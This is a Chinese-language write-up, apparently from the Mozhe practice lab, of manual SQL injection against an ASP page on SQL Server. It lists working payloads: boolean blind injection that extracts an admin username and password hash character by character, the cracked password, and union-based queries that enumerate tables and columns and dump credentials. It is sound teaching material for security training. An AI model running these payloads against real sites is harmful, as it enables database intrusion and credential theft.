還是先找到注入點,然后order by找出字段數:4
通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢,判斷顯示的是哪些字段,就是原本顯示標題和內容時候的查詢字段。此處返回的是錯誤頁面,說明系統禁止使用union進行相關SQL查詢,我們得使用其他方式進行手工SQL注入。
一、盲注
盲猜爆出表名
通過SQL語句中的and exists(select username from manage)查詢,判斷manage數據庫表表中存在的字段。此處返回內容為正常頁面,說明數據庫表中存在username字段。同理找出password字段
頁面提交:http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
數據庫執行語句:select * from manage where id=2 and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)
頁面返回描述:返回內容為正常頁面
分析解說:通過SQL語句中的通過SQL語句中的and exists (select id from manage where unicode(substring(username,2,1))=100 and ID=1)查詢,判斷manage數據庫表表中id=1的username字段值的第一位字符。此處返回內容為正常頁面,說明數據庫表中ID=1的username字段值的第一位等於‘d’。
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,3,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,4,1))=105 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,5,1))=110 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,6,1))=95 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,7,1))=109 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(username,8,1))=122 and ID=1)
最后得到的username值是:admin_mz
利用注入username字段值的方法對password字段進行注入,分別提交以下URL請求,即可得到id=1的password字段的值。
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,1,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,2,1))=50 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,3,1))=101 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,4,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,5,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,6,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,7,1))=99 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,8,1))=51 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,9,1))=102 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,10,1))=48 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,11,1))=49 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,12,1))=98 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,13,1))=55 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,14,1))=53 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,15,1))=56 and ID=1)
http://mozhe.cn/new_list.asp?id=2 and exists (select id from manage where unicode(substring(password,16,1))=51 and ID=1)
最后得到的password值是:72e1bfc3f01b7583
通過MD5解密網站得知明文password值為97285101
二、union all
http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,null,null,null
用union all select null,null,null,null四個null分別嘗試回顯位置,得到回顯語句:
http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,2,null,null
//逐一測試,顯示位3為字符型,導致的一些bug
http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,2,'3',null
數據庫
//這里也可以使用db_name(1)、db_name(2)查詢其他數據庫
http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,db_name(),null,null
結果為:mozhe_db_v2
表
http://219.153.49.228:44082/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),'3',4
//xtype='u' :查看用戶表
結果:manage
查看有沒別的表
http://219.153.49.228:44082/new_list.asp?id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),'3',4
結果:announcement
繼續查看表
id=-2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage','announcement')),'3',4
結果空,說明沒有別的了。
列名
id=-2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
得出:id
id=-2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
得出:username
id=-2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
得出:password
id=-2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null
得出:空
說明mange表總共有3列,分別為:id、username、password
爆破:
http://219.153.49.228:44082/new_list.asp?id=-2 union all select null,username, password ,null from manage